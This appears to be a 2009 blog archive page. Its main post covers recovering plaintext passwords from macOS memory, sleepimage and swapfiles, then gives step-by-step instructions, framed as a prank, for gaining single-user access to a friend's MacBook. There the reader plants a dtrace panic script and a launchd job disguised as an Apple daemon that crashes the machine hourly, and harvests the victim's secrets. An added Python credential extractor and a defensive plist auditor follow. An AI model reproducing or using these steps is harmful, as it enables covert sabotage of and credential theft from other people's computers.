Archive for June, 2009

Building a Kismet Drone with OpenWRT

I did a short talk today on building an OpenWRT image at one of our local Linux Users Groups.  I also briefly showed how to use it to be a Kismet drone since that is one of my favorite uses.

Here is a brief rundown of the steps needed to build OpenWRT from source for your router. The wiki article below mentions the WRTSL54GS, but it really isn't tailored to it, so the steps are basically the same for any supported router.
OpenWRT for the WRTSL54GS


Killing time on the macbook

A couple months ago I was tooling around on the mac causing some kernel panic dumps to see what info the dump file writes out. The panic file wasn’t overly cool, so it caused me to hunt around for more “interesting” items on my machine. Of course, the first interesting item I looked thru was the laptop memory. Unlike a lot of OS X’s Unix brethren, the memory device files aren’t enabled in the kernel so you have to enable them and reboot.

root# nvram boot-args="kmem=1"

After reboot, I dumped the memory to a file which took about 67 seconds for my 2GB of ram. I’m not sure what the Bad address issue is. I haven’t looked into it but it still dumps the file.

root# dd if=/dev/mem of=/var/root/memdump bs=1024
dd: /dev/mem: Bad address
2097152+0 records in
2097152+0 records out
2147483648 bytes transferred in 67.244043 secs (31935671 bytes/sec)

Then I filtered out the “readable” stuff by just running strings against it, only grabbing the ascii strings 4 characters or greater.

strings -n 4 memdump > memdump-ascii

As with memory dumping on other OSes, there isn't anything new here, but there are always some useful and interesting items to browse through, so reading memory is always worth a look. I moved on and started to poke around at other files, though, and in my case the hibernation file and the swap files were pretty juicy, definitely better than my memory dump.

# cd /var/vm/
# strings -n 4 sleepimage > sleepimage-ascii
# strings -n 4 swapfile0 > swapfile0-ascii
# strings -n 4 swapfile1 > swapfile1-ascii

Reading the sleepimage-ascii file I was able to find my regular account and the root user passwords, plus a ton more interesting things.
The swapfile had some cool items too. I noticed some MobileMe calls. I am not sure what kicked off the MobileMe since I don’t use it and believe I have disabled it in iTunes and such but this was a fairly new installation so it could have been pre-configuration leftovers. But I do wonder, does this mean if I had a MobileMe account the password could show up in the swapfile? I might have to sign up for MobileMe and give it a whirl.

http://www.apple.com/SyncServices
Failed to login to account: %@
initWithCredentials: username is missing!
/SourceCache/DotMacSyncManager/DotMacSyncManager-308/src/SMSession.m
initWithCredentials: password is missing!
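As an added example (not code from the original post), here is a small Python equivalent of the `strings -n 4` pass above, plus the triage step of pulling out every string that mentions a credential keyword together with its neighbours, which is what reading the -ascii files by hand amounts to. The input blob is constructed here to mimic a few bytes of a swapfile, modelled on the MobileMe strings quoted above.

```python
import re

# Constructed sample standing in for a few bytes of sleepimage/swapfile:
# binary noise around readable C strings, modelled on the MobileMe hits
# quoted above. Nothing here comes from a real dump.
SAMPLE = (
    b"\x00\x01\x02ab\x00"                      # "ab" is shorter than 4
    b"http://www.apple.com/SyncServices\x00\xff"
    b"Failed to login to account: %@\x00"
    b"initWithCredentials: username is missing!\x00\x00"
    b"username=alice\x00password=hunter2\x00\x7f"  # the kind of pair the post found
    b"initWithCredentials: password is missing!\x00"
)

# Same notion of "printable" as strings(1): space..tilde, plus tab.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}

def extract_strings(blob, min_len=4):
    """Equivalent of `strings -n min_len`: (offset, text) for each run
    of at least min_len printable ASCII bytes."""
    runs, start = [], None
    for i, byte in enumerate(blob):
        if byte in PRINTABLE:
            start = i if start is None else start
        elif start is not None:
            if i - start >= min_len:
                runs.append((start, blob[start:i].decode("ascii")))
            start = None
    if start is not None and len(blob) - start >= min_len:
        runs.append((start, blob[start:].decode("ascii")))
    return runs

def credential_hits(blob, keywords=("password", "passwd", "credential"), context=1):
    """Triage pass: every extracted string mentioning a keyword, returned
    with its neighbours so the analyst sees what sits next to the hit."""
    runs = extract_strings(blob)
    pattern = re.compile("|".join(map(re.escape, keywords)), re.IGNORECASE)
    hits = []
    for idx, (offset, text) in enumerate(runs):
        if pattern.search(text):
            window = runs[max(0, idx - context): idx + context + 1]
            hits.append((offset, [t for _, t in window]))
    return hits

if __name__ == "__main__":
    for offset, text in extract_strings(SAMPLE):
        print(f"{offset:08x}  {text}")
    for offset, window in credential_hits(SAMPLE):
        print(f"hit at {offset:#x}: {window}")
```

Run it against a real `memdump` or `sleepimage` by reading the file into `SAMPLE`'s place; the offsets let you go back to the raw file with a hex editor.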

While the panic file created using dtrace was a little disappointing, it got me thinking of "evil" uses for it. I've been to my local Apple store a lot lately, so I started envisioning all their demo machines crashing at the same time every day, but that wouldn't be too cool, and everyone I have dealt with at the store is pretty cool, so I wouldn't want to tick them off. Doing this to a friend, on the other hand, might be worth the repercussions. Not that I would do such an immature thing, but let's say you wanted to mess with your friend's bright and shiny MacBook; here is what I would do. Depending on your typing skills you might need 5-10 minutes alone with the laptop. First reboot the laptop and enter single user mode by pressing the Command (Apple) key + s (or F2 if using rEFIt). Once in single user mode, create a little script to run from OS X's crontab replacement, launchd. I like calling a script instead of specifying the program and arguments in the launchd task because I always find it easier to troubleshoot if something isn't working nicely.

# vi evil.sh

In the script add the following and then change the perms to be executable.

#!/bin/bash
dtrace -w -n "BEGIN{ panic();}"

# chmod 700 evil.sh

Next create a plist file (an overly complex XML file just to add a cron job) in the LaunchDaemons directory; putting it there lets it run at its scheduled time without any particular user being logged in.

# cd /Library/LaunchDaemons
# vi com.apple.evilcron.plist

In the plist file add

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.evilcron</string>
    <key>ProgramArguments</key>
    <array>
        <string>/var/root/evil.sh</string>
    </array>
    <key>StartCalendarInterval</key>
    <dict>
        <!-- Minute takes 0-59; 0 fires at the top of every hour, i.e. every 60 minutes -->
        <key>Minute</key>
        <integer>0</integer>
    </dict>
</dict>
</plist>

Then initiate the newly created plist file.

# launchctl load com.apple.evilcron.plist

Now every 60 minutes the laptop will kernel panic causing a hard reboot.
While you are in single user mode and if you have the time, you might as well have some more fun with their laptop and poke thru the swapfile and sleepimage. You could also enable the memory device driver file so you can poke thru there but you would need to reboot.

root# nvram boot-args="kmem=1"
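As an added example (not code from the original post), this is the kind of check a defender would run over /Library/LaunchDaemons to catch a job like the one above: it parses a launchd plist with plistlib and flags a com.apple.* label living outside /System, a program that runs from somewhere like /var/root, a StartCalendarInterval value outside the valid range, and a wrapped script that calls dtrace -w / panic(). The sample plist and script are constructed from the post; the trusted-path list and the ranges are my own assumptions.

```python
import plistlib

# Constructed sample: the plist and script from the post, rebuilt as valid
# XML and used here only as input to the auditor.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.evilcron</string>
  <key>ProgramArguments</key><array><string>/var/root/evil.sh</string></array>
  <key>StartCalendarInterval</key><dict><key>Minute</key><integer>60</integer></dict>
</dict></plist>"""
SAMPLE_SCRIPT = '#!/bin/bash\ndtrace -w -n "BEGIN{ panic();}"\n'

# Assumed-safe prefixes for a daemon's program (my assumption; tune per fleet).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/", "/Applications/")
CALENDAR_RANGES = {"Minute": (0, 59), "Hour": (0, 23), "Day": (1, 31), "Weekday": (0, 7), "Month": (1, 12)}

def audit_plist(plist_path, data):
    """Parse one launchd plist and return (program, findings)."""
    job = plistlib.loads(data)
    findings = []
    label = job.get("Label", "")
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    program = args[0] if args else ""
    # Apple's own jobs ship under /System; a com.apple.* label elsewhere is mimicry.
    if label.startswith("com.apple.") and not plist_path.startswith("/System/"):
        findings.append(f"label {label!r} mimics Apple but lives in {plist_path}")
    if program and not program.startswith(TRUSTED_PREFIXES):
        findings.append(f"program {program!r} runs from an untrusted location")
    cal = job.get("StartCalendarInterval") or {}
    for entry in (cal if isinstance(cal, list) else [cal]):
        for key, (lo, hi) in CALENDAR_RANGES.items():
            if key in entry and not lo <= entry[key] <= hi:
                findings.append(f"StartCalendarInterval {key}={entry[key]} is outside {lo}-{hi}")
    return program, findings

def audit_script(text):
    """Flag the destructive dtrace usage the post's script relies on."""
    findings = []
    if "dtrace" in text and "-w" in text.split():
        findings.append("script runs dtrace -w (destructive actions enabled)")
    if "panic()" in text:
        findings.append("script invokes the dtrace panic() action")
    return findings

def audit_daemon(plist_path, data, scripts):
    """scripts maps program path -> contents so the check runs offline."""
    program, findings = audit_plist(plist_path, data)
    return findings + audit_script(scripts.get(program, ""))
```

On a live system, feed it each file under /Library/LaunchDaemons and read the referenced script from disk instead of the `scripts` mapping.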

Kernel Panic
